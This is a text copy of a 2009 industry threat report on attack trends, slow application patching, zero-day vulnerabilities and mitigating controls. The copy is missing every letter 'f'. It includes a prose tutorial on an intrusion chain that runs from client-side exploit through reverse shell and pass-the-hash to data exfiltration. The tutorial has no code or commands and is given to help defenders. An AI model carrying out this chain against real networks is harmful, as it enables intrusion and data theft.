Top Cyber Security Risks September 2009

8/3/2019 Top Cyber Security Risks September 2009

1/24

The Top Cyber Security RisksTwo risks dwar all others, but organizations ail to mitigate them

Featuring attack data rom TippingPoint intrusion prevention systems protecting 6,000

organizations, vulnerability data rom 9,000,000 systems compiled by Qualys, and

additional analysis and tutorial by the Internet Storm Center and key SANS aculty

members.

September 2009

Contents . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . .. . . . . . . . .1

Executive summary . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . .. . . . . . . . . . .2

Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4

Vulnerability exploitation trends . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . .. . . . . . . . . . . .5

Application vulnerabilities exceed OS vulnerabilities ......................................5

Web application attacks .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... ..5

Windows: Concker/Downadup .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... 6

Apple: QuickTime and six more ... ... ... ... ... ... ... ... ... .. ... ... ... ... .. ... ... ... ... .. ... .7

Origin and destination analysis or our key attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .7

Application patching is much slower than operating system patching . . . . . . . . . . . . . .14

Tutorial: Real-lie HTTP client-side exploitation example . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .18

Step 0: Attacker places content on trusted site .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .18

Step 1: Client-side exploitation ... ... ... ... .. ... ... ... ... .. ... ... ... .. ... ... ... ... .. ... ... ..19

Step 2: Establish reverse shell backdoor using HTTPS .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .19

Steps 3 and 4: Dump hashes and use pass-the-hash attack to pivot . . . .. .. . .. . .. . .. . .. 20

Step 5: Pass the hash to compromise domain controller .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. 20

Steps 6 and 7: Exltration .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... ..21

Zero-day vulnerability trends . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . .21

Best practices in mitigation and control o the top risks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .23

Critical Controls - As Applied to HTTP Server Threats .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .2 3

1


2/24

The Top Cyber Security Risks September 2009

2

Executive Summary

Priority One: Client-side sotware that remains unpatched.Waves o targeted email attacks, oten called spear phishing, are exploiting client-side

vulnerabilities in commonly used programs such as Adobe PDF Reader, QuickTime,

Adobe Flash and Microsot Oce. This is currently the primary initial inection vector

used to compromise computers that have Internet access. Those same client-side

vulnerabilities are exploited by attackers when users visit inected web sites. (See

Priority Two below or how they compromise the web sites). Because the visitors eel

sae downloading documents rom the trusted sites, they are easily ooled into opening

documents and music and video that exploit client-side vulnerabilities. Some exploits do

not even require the user to open documents. Simply accessing an inected website is

all that is needed to compromise the client sotware. The victims inected computers

are then used to propagate the inection and compromise other internal computers

and sensitive servers incorrectly thought to be protected rom unauthorized access by

external entities. In many cases, the ultimate goal o the attacker is to steal data rom the

target organizations and also to install back doors through which the attackers can return

or urther exploitation. On average, major organizations take at least twice as long to

patch client-side vulnerabilities as they take to patch operating system vulnerabilities. In

other words the highest priority risk is getting less attention than the lower priority risk.

Priority Two: Internet-acing web sites that are vulnerable.

Attacks against web applications constitute more than 60% o the total attack attempts

observed on the Internet. These vulnerabilities are being exploited widely to convert

trusted web sites into malicious websites serving content that contains client-side

exploits. Web application vulnerabilities such as SQL injection and Cross-Site Scripting

faws in open-source as well as custom-built applications account or more than 80%

o the vulnerabilities being discovered. Despite the enormous number o attacks and

despite widespread publicity about these vulnerabilities, most web site owners ail to

scan eectively or the common faws and become unwitting tools used by criminals to

inect the visitors that trusted those sites to provide a sae web experience.

Operating systems continue to have ewer remotely-exploitable vulnerabilities that

lead to massive Internet worms.

Other than Concker/Downadup, no new major worms or OSs were seen in the wildduring the reporting period. Even so, the number o attacks against buer overfow

vulnerabilities in Windows tripled rom May-June to July-August and constituted over

90% o attacks seen against the Windows operating system.


3/24


3

Rising numbers o zero-day vulnerabilities.

World-wide there has been a signicant increase over the past three years in the number

o people discovering zero-day vulnerabilities, as measured by multiple independentteams discovering the same vulnerabilities at dierent times. Some vulnerabilities have

remained unpatched or as long as two years. There is a corresponding shortage o highly

skilled vulnerability researchers working or government and sotware vendors. So long

as that shortage exists, the deenders will be at a signicant disadvantage in protecting

their systems against zero-day attacks. A large decline in the number o PHP File

Include attacks appears to refect improved processes used by application developers,

system administrators, and other security proessionals.


4/24


4

Overview

Throughout the developed world, governments, deense organizations, and companiesin nance, power, and telecommunications are increasingly targeted by overlapping

surges o cyber attacks rom criminals and nation-states seeking economic or military

advantage. The number o attacks is now so large and their sophistication so great, that

many organizations are having trouble determining which new threats and vulnerabilities

pose the greatest risk and how resources should be allocated to ensure that the most

probable and damaging attacks are dealt with rst. Exacerbating the problem is that most

organizations do not have an Internet-wide view o the attacks.

This report uses current data covering March 2009 to August 2009 rom appliances

and sotware in thousands o targeted organizations to provide a reliable portrait o

the attacks being launched and the vulnerabilities they exploit. The reports purpose is

to document existing and emerging threats that pose signicant risk to networks and

the critical inormation that is generated, processed, transmitted, and stored on those

networks. This report summarizes vulnerability and attack trends, ocusing on those

threats that have the greatest potential to negatively impact your network and your

business. It identies key elements that enable these threats and associates these key

elements with security controls that can mitigate your risk.

The reports target audience is major organizations that want to ensure their deenses are

up-to-date and are tuned to respond to todays newest attacks and to the most pressing

vulnerabilities. Data on actual attacks comes rom intrusion prevention appliances

deployed by TippingPoint that protect more than 6000 companies and government

agencies. Data on vulnerabilities that remain unpatched comes rom appliances and

sotware deployed by Qualys that monitor vulnerabilities and conguration errors in

more than 9,000,000 systems, scanned more than 100,000,000 times so ar in 2009.

The patterns in the data are vetted by the senior sta at the Internet Storm Center and

by the aculty o the SANS Institute responsible or SANS programs in hacker exploits,

penetration testing, and orensics. In other words, these ndings refect a usion o data

and experience never beore brought together.

The report also includes a pictorial description/tutorial on how some o the most

damaging current attacks actually work. One o the most important ndings incybersecurity over the past several years has been the understanding most oten

asserted by White House ocials that oense must inorm deense. Only people who

understand how attacks are carried out can be expected to be eective deenders. The

tutorial shows what actually happened in a very damaging attack and is excerpted rom

Ed Skoudis SANS Hacker Exploits and Incident Handling class. It is included to boost

deenders understanding o current attack techniques.


5/24


5

The report was compiled by Rohit Dhamankar, Mike Dausin, Marc Eisenbarth and James

King o TippingPoint with assistance rom Wolgang Kandek o Qualys, Johannes Ullrich

o the Internet Storm Center, and Ed Skoudis and Rob Lee o the SANS Institute aculty.

Vulnerability Exploitation Trends

Application Vulnerabilities Exceed OS Vulnerabilities

During the last ew years, the number o vulnerabilities being discovered in applications

is ar greater than the number o vulnerabilities discovered in operating systems. As

a result, more exploitation attempts are recorded on application programs. The most

popular applications or exploitation tend to change over time since the rationale or

targeting a particular application oten depends on actors like prevalence or the inability

to eectively patch. Due to the current trend o converting trusted web sites into

malicious servers, browsers and client-side applications that can be invoked by browsersseem to be consistently targeted.

Figure 1: Number o Vulnerabilities in Network, OS and Applications

Web Application Attacks

There appear to be two main avenues or exploiting and compromising web servers:

brute orce password guessing attacks and web application attacks. Microsot SQL,

FTP, and SSH servers are popular targets or password guessing attacks because othe access that is gained i a valid username/password pair is identied. SQL Injection,

Cross-site Scripting and PHP File Include attacks continue to be the three most popular

techniques used or compromising web sites. Automated tools, designed to target

custom web application vulnerabilities, make it easy to discover and inect several

thousand web sites.


6/24


6

Windows: Confcker/Downadup

Attacks on Microsot Windows operating systems were dominated by Concker/

Downadup worm variants. For the past six months, over 90% o the attacks recordedor Microsot targeted the buer overfow vulnerability described in the Microsot

Security Bulletin MS08-067. Although in much smaller proportion, Sasser and Blaster, the

inamous worms rom 2003 and 2004, continue to inect many networks.

Figure 2: Attacks on Critical Microsot Vulnerabilities (last 6 months)

Figure 3: Attacks on Critical Microsot Vulnerabilities (last 6 months)


7/24


7

Apple: QuickTime and Six More

Apple has released patches or many vulnerabilities in QuickTime over the past year.

QuickTime vulnerabilities account or most o the attacks that are being launchedagainst Apple sotware. Note that QuickTime runs on both Mac and Windows Operating

Systems. The ollowing vulnerabilities should be patched or any QuickTime installations:

CVE-2009-0007, CVE-2009-0003, CVE-2009-0957

Figure 4: Attacks on Critical Apple Vulnerabilities (last 6 months)

Origin and Destination Analysis or Four Key Attacks

Over the past six months, we have seen some very interesting trends when comparing

the country where various attacks originate to the country o the attack destination. In

order to show these results, we have characterized and presented the data in relation

to the most prevalent attack categories. The analysis perormed or this report identied

these attack categories as high-risk threats to most i not all networks, and as such,

should be at the oreront o security practitioners minds. These categories are Server-

Side HTTP attacks, Client-Side HTTP attacks, PHP Remote File Include, Cross-site

Scripting attacks, and nally SQL Injection attacks. As you might expect, there is some

overlap in these categories, with the latter three being subsets o the rst two categories.

However, the trends we see in separating this data is worth pointing out.

The SQL Injection attacks that compose this category include SQL Injection using

SELECT SQL Statement, SQL Injection Evasion using String Functions, and SQL

Injection using Boolean Identity. The most prominent PHP Remote File Include attack

is one that looks or a very small HTTP request that includes a link to another website as

a parameter that contains a very specic evasion technique used by a number o attacks


8/24


8

to increase the reliability o their attacks. Also o note is a very specic attack against the

Zeroboard PHP application, the only single application that made the top attacks. The

nal type o attack included in these statistics is one o the more popular HTTP ConnectTunnel attacks, which remains a staple in the Server-Side HTTP category. The HTTP

connect tunnels are used or sending spam emails via mis-congured HTTP servers.

Looking at the breakdown by country we see that the United States is by ar the major

attack target or the Server-Side HTTP attack category (Figure 5).

Figure 5: Server-Side HTTP Attacks by Destination Country (last 6 months)

For years, attack targets in the United States have presented greater value propositions

or attackers, so this statistic really comes as no surprise.

An interesting spike in Server-Side HTTP attacks occurred in July 2009. This was entirely

due to SQL Injection attacks using the SELECT command. Upon looking at the data, we

saw a massive campaign by a range o IP addresses located at a very large Internet Server

Provider (ISP). In this case, there were a number o machines located at a single collocation

site that may have all been compromised with the same vulnerability due to the machines

being at the same patch level. In addition, a number o gambling sites took part in this

attack which peaked ater hours on July Fourth, a major holiday in the United States.


9/24


9

Figure 6: Server-Side HTTP Attacks (last 6 months)

Finally lets turn to the source o these HTTP Server-Side Attacks (Figure 7).

Figure 7: Server-Side HTTP Attacks by Source Country (last 6 months)

Here we see the United States as by ar the largest origin, which is a pattern that has

continued or some time. In many cases we believe these to be compromised machines

that are then being used or urther nearious purposes. The next our oenders on the

HTTP Server-Side attacking countries list are Thailand, Taiwan, China, and the Republic o

Korea. They also show up in other portions o this report, so this graph will be a useul

reerence in comparing some o the other attack categories and their relative magnitude.


10/24

10


The last six months have seen a lot o activity with SQL injection attacks. Some typical

patterns emerge with the United States being both the top source o and destination or

SQL Injection events.

SQL Injection on the internet can more or less be divided into two sub-categories:

Legitimate SQL Injection and Malicious SQL Injection. Many web applications on the

Internet still use SQL Injection or their normal unctionality. It should be noted that

this is only a dierence in intent. The web applications that legitimately use SQL Injection

are guaranteed to be vulnerable to the tools and techniques used by attackers to perorm

Malicious SQL Injections. The servers that house these applications may have a higher

compromise rate not only because they are known to be vulnerable, but also because

they need to distinguish between legitimate and malicious injects to identiy attacks.

Figure 8: SQL Injection Attacks by Destination Country (last 6 months)

Looking at the magnitude o these attacks broken down by month (Figure 9), we see the

large-scale SQL Injection campaign pointed out in the Server-Side HTTP Attack section.

A very large spike in SQL Injection attacks in July was caused mostly by an online

advertiser who distributed code to many aliates using SQL injection as unctionality.The application was quickly pulled, resulting in a large drop in events or the month o

August.


11/24


11

Figure 9: SQL Injection Attacks (last 6 months)

The source distribution o many o these attacks is much more diverse than the

destination. China is now the single largest source outside o the United States. Again

the overwhelming destination or these events is in the United States. (Figure 10).

Figure 10: SQL Injection Attacks by Source Country (6 months)

In conclusion, we cannot overstate the importance o protecting DMZ-based web

applications rom SQL Injection attacks. Increasingly, the ultimate objective o attackers

is the acquisition o sensitive data. While the media may consistently report attacker

targets as being credit cards and social security numbers, that is more due to the popular

understanding o the marketability o this data. They are not the only valuable data types


12/24


12

that can be compromised. Since SQL Injection attacks oer such easy access to data, it

should be assumed that any valuable data stored in a database accessed by a web server

is being targeted.

Although PHP File Include attacks have been popular, we have seen a notable decline

in the overall number o attacks that have taken place. With the exception o a major

attacks originating rom Thailand in April, the number o PHP File Include attacks in

August is less than hal the March/May average.

There are many ways to protect against these attacks. Apache conguration, input

sanitization, and network security equipment are all very good at deterring these attacks,

so it seems likely that the drop in total attacks is at least partly due to a positive response

by application developers, system administrators, and security proessionals. However,

due to the extreme ease with which these attacks are carried out, and the enormousbenet o a successul attack (arbitrary PHP code is executed.), attacks such as these are

likely to remain popular or some time.

Figure 11: PHP Remote File Include Attacks (last 6 months)

Let us look at the sources o PHP Remote File Include attacks. A major attack

campaign was launched out o Thailand in April that caused Thailand to show up atnumber 1 in this list.


13/24


13

Figure 12: PHP Remote File Include Attacks by Source Country (6 months)

Cross Site Scripting (XSS) is one o the most prevalent bugs in todays web applications.

Unortunately, developers oten all in the trap o introducing XSS bugs while creating

custom code that connects all o the diverse web technologies that are so prevalent in

todays Web 2.0 world. Another very common use o XSS is by various advertisers

analytic systems. For example, an advertisers banner might be embedded in a web page

which is set up to refect some JavaScript o o the advertisers HTTP server or tracking

purposes. However, in this case, there is little risk because the site in question (usually)

has ull control over his/her page, so this request to the advertiser is not generally

malicious. It is the refection attacks, along with attacks that leverage faws in ormdata handling, that make up the vast majority o XSS attacks that we have seen in the

last six months.

Figure 13: XSS Attacks by Source Country (last 6 months)


14/24


14

Attacks sourced rom the United States have been on a steady decline month-over-

month. The Republic o Korea has seen a 50% reduction in the last 30 days. These two

events however have been oset by a sudden 20% increase in the last 30 days in attacksrom Australia. The other three major players, namely, Hong Kong, China and Taiwan have

remained stable over the past three month periods in this category.

Application Patching is Much Slowerthan Operating System Patching

Qualys scanners collect anonymized data o detected vulnerabilities to capture the

changing dynamics in the vulnerability assessment eld. The data documents changes

such as the decline o server side vulnerabilities and the corresponding rise o

vulnerabilities on the client side, both in operating system components and applications.

A Top 30 ranking is used oten to see i major changes occur in the most requentvulnerabilities ound. Here is the ranking or the rst hal o 2009 edited to remove

irrelevant data points such as 0-day vulnerabilities.

Description

WordPad and Oce Text Converters Remote Code Execution Vulnerability (MS09-010)

Sun Java Multiple Vulnerabilities (244988 and others)

Sun Java Web Start Multiple Vulnerabilities May Allow Elevation o Privileges(238905)

Java Runtime Environment Virtual Machine May Allow Elevation o Privileges (238967)

Adobe Acrobat and Adobe Reader Buer Overfow (APSA09-01)

Microsot SMB Remote Code Execution Vulnerability (MS09-001)

Sun Java Runtime Environment GIF Images Buer Overfow Vulnerability

Microsot Excel Remote Code Execution Vulnerability (MS09-009)

Adobe Flash Player Update Available to Address Security Vulnerabilities (APSB09-01)

Sun Java JDK JRE Multiple Vulnerabilities (254569)

Microsot Windows Server Service Could Allow Remote Code Execution (MS08-067)

Microsot Oce PowerPoint Could Allow Remote Code Execution (MS09-017)

Microsot XML Core Services Remote Code Execution Vulnerability (MS08-069)

Microsot Visual Basic Runtime Extended Files Remote Code Execution Vulnerability (MS08-070)

Microsot Excel Multiple Remote Code Execution Vulnerabilities (MS08-074)

Vulnerabilities in Microsot DirectShow Could Allow Remote Code Execution (MS09-028)

Microsot Word Multiple Remote Code Execution Vulnerabilities (MS08-072)

Adobe Flash Player Multiple Vulnerabilities (APSB07-20)

Adobe Flash Player Multiple Security Vulnerabilities (APSB08-20 )

Third Party CAPICOM.DLL Remote Code Execution Vulnerability

Microsot Windows Media Components Remote Code Execution Vulnerability (MS08-076)

Adobe Flash Player Multiple Vulnerabilities (APSB07-12)

Microsot Oce Remote Code Execution Vulnerability (MS08-055)


15/24


15

Description

Adobe Reader JavaScript Methods Memory Corruption Vulnerability (APSA09-02 and APSB09-06)

Microsot PowerPoint Could Allow Remote Code Execution (MS08-051)

Processing Font Vulnerability in JRE May Allow Elevation o Privileges(238666)

Microsot Oce Could Allow Remote Code Execution (MS08-016)

Adobe Acrobat/Reader util.print() Buer Overfow Vulnerability (APSB08-19)

Adobe Acrobat and Adobe Reader Multiple Vulnerabilities (APSB08-15)

Windows Schannel Security Package Could Allow Spoong Vulnerability (MS09-007)

Table 1: Qualys Top 30 in H1 2009

Some o the vulnerabilities listed in the table get quickly addressed by IT administrators

vulnerabilities in the base operating system class, or example, show a signicant drop ineven the rst 15 days o their lietime:

Figure 14: Microsot OS Vulnerabilities

But at least hal o the vulnerabilities in the list, primarily vulnerabilities ound in

applications receive less attention and get patched on a much slower timeline. Some o

these applications, such as Microsot Oce and Adobe Reader are very widely installedand so expose the many systems they run on to long lived threats. The ollowing graphs

plot the number o vulnerabilities detected or Microsot Oce and Adobe Reader

normalized to the maximum number o vulnerabilities detected in the timerame.

Periodic drops in detection rates occur during the weekends when scanning ocuses on

servers rather than desktop machines and the detection rates o vulnerabilities related to

desktop sotware all accordingly.


16/24


16

Figure 15: Microsot PowerPoint and Adobe Vulnerabilities Patching Cycles

Attackers have long picked up on this opportunity and have switched to dierent types

o attacks in order to take advantage o these vulnerabilities, using social engineering

techniques to lure end-users into opening documents received by e-mail or by inectingwebsites with links to documents that have attacks or these vulnerabilities embedded.

These inected documents are not only placed on popular web sites that have a large

number o visitors, but increasingly target the long-tail, the thousands o specialized

websites that have smaller but very aithul audiences. By identiying and exploiting

vulnerabilities in the Content Management Systems used by these sites, attackers can

automate the inection process and reach thousands o sites in a matter o hours. Attacks


17/24


17

using PDF vulnerabilities have seen a large increase in late 2008 and 2009 as it became

clear to attackers how easy it is to use this method o getting control over a machine.

Adobe Flash has similar problems with the applications o its updates there are our

Flash vulnerabilities in our Top 30 list that date back as ar as 2007:

Figure 16: Flash Vulnerabilities

Flash presents additional challenges: it does not have its automatic update mechanism

and one needs to patch Internet Explorer in a separate step rom other browsers. For

users that have more than one browser installed, it is quite easy to orget to completely

close Flash vulnerabilities and continue to be unwillingly vulnerable.

One o the other sotware amilies that is high on the Top 30 list is Java, which is widely

installed or running Java applets in the common browsers and also increasingly or

normal applications. It is quite slow in the patch cycle, with actually increasing numbers

o total vulnerabilities as the introduction o new vulnerabilities outweighs the eect

o patching. Java has the additional problem that until recently new versions did not

uninstall the older code, but only pointed deault execution paths to the new, xed

version; attack code could be engineered to take advantage o the well-known paths andcontinue to use older and vulnerable Java engines.


18/24


18

Figure 17: Sun Java Vulnerabilities

Tutorial: Real Lie HTTP Client-side Exploitation Example

This section illustrates an example o a real lie attack conducted against an organization

that resulted in loss o critical data or the organization.

In this attack, Acme Widgets Corporation suered a major breach rom attackers who

were able to compromise their entire internal network inrastructure using two o the

most powerul and common attack vectors today: Exploitation o client-side sotware and

pass-the-hash attacks against Windows machines.

Step 0: Attacker Places Content on Trusted SiteIn Step 0, the attacker begins by placing content on a trusted third-party website, such

as a social networking, blogging, photo sharing, or video sharing website, or any other

web server that hosts content posted by public users. The attackers content includes

exploitation code or unpatched client-side sotware.


19/24


19

Step 1: Client-Side ExploitationIn Step 1, a user on the internal Acme Widgets enterprise network surs the Internet

rom a Windows machine that is running an unpatched client-side program, such as a

media player (e.g., Real Player, Windows Media Player, iTunes, etc.), document display

program (e.g., Acrobat Reader), or a component o an oce suite (e.g., Microsot Word,

Excel, Powerpoint, etc.). Upon receiving the attackers content rom the site, the victim

users browser invokes the vulnerable client-side program passing it the attackers exploit

code. This exploit code allows the attacker to install or execute programs o the attackers

choosing on the victim machine, using the privileges o the user who ran the browser.

The attack is partially mitigated because this victim user does not have administrator

credentials on this system. Still, the attacker can run programs with those limited user

privileges.

Step 2: Establish Reverse Shell Backdoor Using HTTPSIn Step 2, the attackers exploit code installs a reverse shell backdoor program on the victim

machine. This program gives the attacker command shell access o the victim machine,

communicating between this system and the attacker using outbound HTTPS access rom

victim to attacker. The backdoor trac thereore appears to be regular encrypted outbound

web trac as ar as the enterprise rewall and network is concerned.


20/24


20

Steps 3 & 4: Dump Hashes and Use Pass-the-Hash Attack to Pivot

In Step 3, the attacker uses shell access o the initial victim system to load a local

privilege escalation exploit program onto the victim machine. This program allowsthe attacker to jump rom the limited privilege user account to ull system privileges

on this machine. Although vendors requently release patches to stop local privilege

escalation attacks, many organizations do not deploy such patches quickly, because such

enterprises tend to ocus exclusively on patching remotely exploitable faws. The attacker

now dumps the password hashes or all accounts on this local machine, including a local

administrator account on the system.

In Step 4, instead o cracking the local administrator password, the attacker uses a

Windows pass-the-hash program to authenticate to another Windows machine on the

enterprise internal network, a ully patched client system on which this same victimuser has ull administrative privileges. Using NTLMv1 or NTLMv2, Windows machines

authenticate network access or the Server Message Block (SMB) protocol based on

user hashes and not the passwords themselves, allowing the attacker to get access

to the le system or run programs on the ully patched system with local administrator

privileges. Using these privileges, the attacker now dumps the password hashes or all

local accounts on this ully patched Windows machine.

Step 5: Pass the Hash to Compromise Domain Controller

In Step 5, the attacker uses a password hash rom a local account on the ully patched

Windows client to access the domain controller system, again using a pass-the-hash

attack to gain shell access on the domain controller. Because the password or the local

administrator account is identical to the password or a domain administrator account,

the password hashes or the two accounts are identical. Thereore, the attacker can

access the domain controller with ull domain administrator privileges, giving the attacker

complete control over all other accounts and machines in that domain.


21/24


21

Steps 6 and 7: Exfltration

In Step 6, with ull domain administrator privileges, the attacker now compromises a

server machine that stores secrets or the organization. In Step 7, the attacker exltrates

this sensitive inormation, consisting o over 200 Megabytes o data. The attacker

pushes this data out to the Internet rom the server, again using HTTPS to encrypt the

inormation, minimizing the chance o it being detected.

Zero-Day Vulnerability Trends

A zero-day vulnerability occurs when a faw in sotware code is discovered and code

exploiting the faw appears beore a x or patch is available. Once a working exploit

o the vulnerability has been released into the wild, users o the aected sotware

will continue to be compromised until a sotware patch is available or some orm o

mitigation is taken by the user.

The File Format Vulnerabilities continue to be the rst choice or attackers to

conduct zero-day and targeted attacks. Most o the attacks continue to target Adobe

PDF, Flash Player and Microsot Oce Suite (PowerPoint, Excel and Word) sotware.

Multiple publicly available uzzing rameworks make it easier to nd these faws. The

vulnerabilities are oten ound in 3rd party add-ons to these popular and wide-spread

sotware suites, making the patching process more complex and increasing theirpotential value to attackers.

The notable zero-day vulnerabilities during past 6 months were:

AdobeAcrobat,Reader,andFlashPlayerRemoteCodeExecutionVulnerability

(CVE-2009-1862)


22/24


22

MicrosoftOfceWebComponentsActiveXControlCodeExecutionVulnerability(CVE-

2009-1136)

MicrosoftActiveTemplateLibraryHeaderDataRemoteCodeExecutionVulnerability

(CVE-2008-0015)

MicrosoftDirectXDirectShowQuickTimeVideoRemoteCodeExecutionVulnerability

(CVE-2009-1537)

AdobeReaderRemoteCodeExecutionVulnerability(CVE-2009-1493)

MicrosoftPowerPointRemoteCodeExecutionVulnerability(CVE-2009-0556)

The ease o nding zero-day vulnerabilities is a direct result o an overall increase in the

number o people having skills to discover vulnerabilities world-wide. This is evidenced

by the act that TippingPoint DVLabs oten receives the same vulnerabilities rom multiple

sources.

For example, MS08-031 (Microsot Internet Explorer DOM Object Heap Overfow

Vulnerability) was discovered independently by three researchers. The rst researcher

submitted remote IE 6/7 critical vulnerability on Oct 22, 2007. A second independent

researcher submitted the same vulnerability on April 23, 2008. A third independent

researcher submitted the same vulnerability on May 19, 2008. All three submissions

outlined dierent approaches o auditing and nding the same vulnerability.

The implication o increasing duplicate discoveries is airly alarming, in that the main

mitigation or vulnerabilities o this type is patching, which is an invalid strategy or

protecting against zero-day exploits. There is a heightened risk rom cyber criminals, who

can discover zero-day vulnerabilities and exploit them or prot. Add to this that sotware

vendors have not necessarily lowered their average time or patching vulnerabilities

reported to them, and that TippingPoint is aware o a number o vulnerabilities that were

reported to vendors two years ago and are still awaiting a patch.

http://www.zerodayinitiative.com/advisories/upcoming/

This makes zero-day exploits in client-side applications one o the most signicant

threats to your network, and requires that you put in place additional inormation security

measures and controls to complement your vulnerability assessment and remediation

activities.


23/24


23

Best Practices in Mitigation and Control o the Top RisksA ew weeks ago, the Center or Strategic and International Studies published an

updated version o the Twenty Critical Controls or Eective Cyber Deense.

http://csis.org/les/publication/Twenty_Critical_Controls_or_Eective_Cyber_Deense_

CAG.pd

These controls refect the consensus o many o the nations top cyber deenders and

attackers on which specic controls must be implemented rst to mitigate known cyber

threats.

One o the most valuable uses o this report is to help organizations deploying the

Twenty Critical Security Controls to be certain that no critical new attacks have been

ound that would orce substantial changes in the Twenty Controls and at the same time

to help people who are implementing the Twenty Critical Security Controls to ocus their

attention on the elements o the controls that need to be completed most immediately.

The Key Elements o these attacks and associated Controls:

Userapplicationshavevulnerabilitiesthatcanbeexploitedremotely,

Controls 2 (Inventory o Sotware), 3 (Secure Congurations), and 10 (Vulnerability

Assessment and Remediation) can ensure that vulnerable sotware is accounted

or, identied or deensive planning, and remediated in a timely manner. Control 5(Boundary Deenses) can provide some prevention/detection capability when attacks

are launched.

Thereisanincreasingnumberofzero-daysinthesetypesofapplications,

Control 12 (Malware Deenses) is the most eective at mitigating many o these

attacks because it can ensure that malware entering the network is eectively

contained. Controls 2, 3, and 10 have minimal impact on zero-day exploits and Control

5 can provide some prevention/detection capabilities against zero-days as well as

known exploits.

Successfulexploitationgrantstheattackerthesameprivilegesonthenetworkasthe

user and/or host that is compromised,

Control 5 (Boundary Deenses) can ensure that compromised host systems (portable

and static) can be contained. Controls 8 (Controlled Use o Administrative Privileges)


24/24


and 9 (Controlled Access) limit what access the attacker has inside the enterprise

once they have successully exploited a user application.

Theattackerismasqueradingasalegitimateuserbutisoftenperformingactionsthat

are not typical or that user.

Controls 6 (Audit Logs) and 11 (Account Monitoring and Control) can help identiy

potentially malicious or suspicious behavior and Control 18 (Incident Response

Capability) can assist in both detection and recovery rom a compromise.

Critical Controls - As Applied to HTTP Server Threats

As discussed previously, web application vulnerabilities and server-side HTTP threats

pose a serious threat not only to the web servers you control, but also the servers that

your users visit in day-to-day activities. Trends have indicated that SQL injection attacks

are rising rapidly. SQL injection attacks are only valid i an application is written in such

a way as to allow them; vulnerability is not a matter o conguration or (usually) access

control.

The Key Elements o these attacks and associated Controls:

Webapplicationshavevulnerabilitiesthatcanbeeasilydiscoveredandexploited

remotely include the ollowing:

Control 7 (Application Sotware Security) is perhaps the most critical control regardingthese types o attacks. Application developers should ensure that all input received

rom remote sources is sanitized o data meaningul to backend database systems.

Control 5 (Boundary Deenses) can ensure that the appropriate layered protections

are in place to prevent/detect attacks aimed at your web servers. Controls 2

(Inventory o Sotware), 3 (Secure Congurations), and 10 (Vulnerability Assessment

and Remediation) can ensure that vulnerable applications are accounted or, identied

or deensive planning, and remediated in a timely manner.

Successfulexploitationgrantstheattackertheabilitytoputmaliciouscodeonthe

server and attempt to compromise all clients that browse that server.

Control 6 (Audit Logs) can assist in identiying when someone has compromised your

web server. Control 18 (Incident Response Capability) can help mitigate the impact o,

and assist in recovery rom, attacks against vulnerable applications.

Corporate Headquarters:7501B North Capital o Texas Hwy.

Austin, Texas 78731 USA

European Headquarters:Herengracht 466, 2nd Floor

1017 CA Amsterdam

Asia Pacifc Headquarters:47 Scotts Road

#11-03 Goldbell Towers

Documents

Top Cyber Security Risks September 2009